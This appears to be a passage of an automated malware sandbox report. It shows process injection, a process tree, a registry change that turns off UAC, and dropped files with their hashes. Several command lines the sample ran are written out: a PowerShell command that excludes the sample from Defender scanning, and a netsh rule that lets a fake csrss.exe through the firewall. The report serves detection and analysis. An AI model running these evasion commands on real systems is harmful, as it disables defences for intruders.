PID 4332 wrote to memory of 4240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe
PID 4332 wrote to memory of 4240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe
PID 2240 wrote to memory of 2924 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2924 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2924 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 244 wrote to memory of 228 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 244 wrote to memory of 228 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 244 wrote to memory of 228 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3652 N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3652 N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3652 N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3172 wrote to memory of 392 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe
PID 3172 wrote to memory of 392 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe
PID 3172 wrote to memory of 392 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe
PID 3172 wrote to memory of 3012 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe
PID 3172 wrote to memory of 3012 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe
PID 3172 wrote to memory of 3012 N/A C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe
PID 1224 wrote to memory of 1428 N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1428 N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 1428 N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3012 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 5044 wrote to memory of 3864 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5044 wrote to memory of 3864 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5044 wrote to memory of 3864 N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 788 wrote to memory of 2992 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 788 wrote to memory of 2992 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 788 wrote to memory of 2992 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe

"C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe"

C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe

"C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe"

C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe

"C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe"

C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe

"C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe"

C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe

"C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe"

C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe

"C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe

"C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe

"C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe"

C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe

"C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe"

C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe

"C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe"

C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe

"C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe"

C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe

"C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe

"C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4240 -ip 4240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 356

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 392 -ip 392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 2008

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network


Files


memory/228-192-0x0000000007A10000-0x0000000007A42000-memory.dmp

memory/228-205-0x0000000007A70000-0x0000000007B13000-memory.dmp

memory/2924-206-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/2924-207-0x000000006FFF0000-0x0000000070344000-memory.dmp

memory/228-204-0x0000000007A50000-0x0000000007A6E000-memory.dmp

memory/2924-217-0x00000000074D0000-0x00000000074DA000-memory.dmp

memory/2924-218-0x0000000007590000-0x0000000007626000-memory.dmp

memory/2924-219-0x00000000074F0000-0x0000000007501000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u2g4.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/3652-234-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/3652-235-0x000000006FFF0000-0x0000000070344000-memory.dmp

memory/228-246-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

memory/228-247-0x0000000007BE0000-0x0000000007BF4000-memory.dmp

memory/228-248-0x0000000007CD0000-0x0000000007CEA000-memory.dmp

memory/228-249-0x0000000007C10000-0x0000000007C18000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 a6ea7bfcd3aac150c0caef765cb52281
SHA1 037dc22c46a0eb0b9ad4c74088129e387cffe96b
SHA256 f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9
SHA512 c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 46a4f71e5629582262e5f05e655db5c9
SHA1 4879a9089582e792416a3acec38873ac7051b6da
SHA256 673d9ce3dc01edcae12b4086ae15d6bfe0387248fc2dc02ce8faff4c20a666d6
SHA512 70a54fe357627c1342dcee851e37cebe3c8af94c858391a22db212da66801ba0b4627c7edc0a9d3bed66bd16440afe0adb0a0f3e9b426bd0e7bd16719f50c6fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 c68f749c595bf5c0ad71f7604c7b0cdb
SHA1 18dd0f6de70826f5c49c82792bb8ac9b28fb6f32
SHA256 60751e4bed7352036d20ecc7938098fec4775822de4033211b2aa452cadd5a43
SHA512 fd2880d78e8b905310d2ba8075ba791fd31b0443221664a760d95a5ef8b83f0b75f06091e535313ce3f306bb9ac4bfd2d676ccda5530e0d15164b3df7a2bdd74

memory/1428-276-0x00000000057D0000-0x0000000005B24000-memory.dmp

memory/3172-278-0x0000000000400000-0x0000000002B1E000-memory.dmp

memory/2240-279-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/244-280-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/3936-282-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1224-281-0x0000000000400000-0x0000000002ED5000-memory.dmp

memory/1428-285-0x000000006FEA0000-0x00000000701F4000-memory.dmp

memory/1428-284-0x0000000070380000-0x00000000703CC000-memory.dmp

memory/1224-298-0x0000000000400000-0x0000000002ED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 a4db32123183147315cead49e5dc7e50
SHA1 82ec33edbfe8991f3bff76015f18122cbb2a8dbe
SHA256 01f95fb835e593bb0ba455e11495b38879b0cf5425357386986aa8351373995e
SHA512 4106a2551ed5268867110e6ecc2b32f7ca21ea5463c7954fc2ffcdfd915702f310534975c77dcf7c5d09817d07fb1c8ac7cf1db9ec82968df9051b8d09383e59

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 0e4cb70ab5a08154c9b41f1d2a9f47ed
SHA1 3dabc6decfd17b43882a309f0282406319dfae14
SHA256 7fd93184220879869ac10380d0d0bd8892586491cae5c94957651e9dde0e3d0a
SHA512 3f77f89d65acf37081dcf1c8c31f0c65851456233bbfe613aa35feccfa36179b4375686f25ad27804e5ec78e9a062e9b48e7cbc6c9c3c7df25bcf8ae96c82684

memory/3012-330-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4520-332-0x000002735F9E0000-0x0000027363214000-memory.dmp

memory/4520-336-0x0000027365050000-0x0000027365064000-memory.dmp

memory/4520-337-0x000002737D9A0000-0x000002737D9C4000-memory.dmp

memory/4520-335-0x0000027365060000-0x000002736506C000-memory.dmp

memory/4520-334-0x0000027363640000-0x0000027363650000-memory.dmp

memory/4520-333-0x000002737DBF0000-0x000002737DCFA000-memory.dmp

memory/4520-339-0x0000027365030000-0x000002736503A000-memory.dmp

memory/4520-340-0x000002737DB10000-0x000002737DBC2000-memory.dmp

memory/4520-342-0x000002737DEC0000-0x000002737DF10000-memory.dmp

memory/4520-341-0x000002737DE40000-0x000002737DE6A000-memory.dmp

memory/4520-343-0x0000027365040000-0x000002736504A000-memory.dmp

memory/4520-347-0x000002737DF10000-0x000002737E210000-memory.dmp

memory/4520-349-0x000002737FB60000-0x000002737FB68000-memory.dmp

memory/4520-352-0x000002737FB80000-0x000002737FB88000-memory.dmp

memory/4520-351-0x000002737FB70000-0x000002737FB7E000-memory.dmp

memory/4520-350-0x000002737FE50000-0x000002737FE88000-memory.dmp

memory/4520-355-0x0000027303600000-0x0000027303622000-memory.dmp

memory/4520-354-0x00000273035A0000-0x0000027303602000-memory.dmp

memory/4520-353-0x0000027303580000-0x000002730358A000-memory.dmp

memory/4520-356-0x0000027303B50000-0x0000027304078000-memory.dmp

memory/4520-359-0x0000027303300000-0x000002730330C000-memory.dmp

memory/4520-360-0x000002737FF10000-0x000002737FF86000-memory.dmp

memory/4520-361-0x000002737E230000-0x000002737E24E000-memory.dmp

memory/4520-368-0x0000027363660000-0x00000273636FA000-memory.dmp

memory/4240-369-0x0000000000400000-0x0000000002AF2000-memory.dmp

memory/3864-410-0x0000000005950000-0x0000000005CA4000-memory.dmp

memory/3864-411-0x0000000006320000-0x000000000636C000-memory.dmp

memory/392-412-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3864-451-0x000000006F8E0000-0x000000006F92C000-memory.dmp

memory/3864-462-0x0000000006DC0000-0x0000000006E63000-memory.dmp

memory/3864-452-0x000000006F930000-0x000000006FC84000-memory.dmp

memory/3864-475-0x00000000072A0000-0x00000000072B1000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/3864-495-0x00000000072F0000-0x0000000007304000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

memory/2992-515-0x000000006F8E0000-0x000000006F92C000-memory.dmp

memory/2992-516-0x000000006F930000-0x000000006FC84000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 62413e2f215769b4ac2949e5199f26ab
SHA1 a9a2fce39fae107a0024433c180b60e6626e0f17
SHA256 be425c1030f2a70de4f59b8481e292110a73e7326640b0a69bc47e86a75e3983
SHA512 4ecbe548db9fd63bde2771ec6b72ec3d8455e661763666611921764590eb5d02c910cac98df1554600620178f235302e438cbcdf01bf6bcf8b7e4088fc3ce6f5

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

memory/1120-537-0x0000000006250000-0x00000000065A4000-memory.dmp

memory/1120-543-0x0000000006EC0000-0x0000000006F0C000-memory.dmp

memory/1120-554-0x000000006FED0000-0x000000006FF1C000-memory.dmp

memory/1120-555-0x0000000070070000-0x00000000703C4000-memory.dmp

memory/1120-565-0x0000000007B90000-0x0000000007C33000-memory.dmp

memory/1120-566-0x0000000006700000-0x0000000006711000-memory.dmp

memory/864-567-0x000000006FED0000-0x000000006FF1C000-memory.dmp

memory/864-568-0x0000000070070000-0x00000000703C4000-memory.dmp

memory/1120-578-0x0000000006740000-0x0000000006754000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b3f201f681dcef7b67772facc4f4c55b
SHA1 ec5bfebd3123c092c2f6b3572c094518e9766bae
SHA256 f63f89c74b2bfb5b779b60767894ea904e2fc1c73d624807f5929d793e042710
SHA512 b9b395fb56a50815063b2b68f655ec695e8f148ba8abd188668ba723ba5ccb81f505d87b4b29cd30aca39bdf971bc5e34a6ddef1ce1acf97a8f2a05c05ed65d5

memory/2896-611-0x0000000070070000-0x00000000703C4000-memory.dmp

memory/2896-610-0x000000006FED0000-0x000000006FF1C000-memory.dmp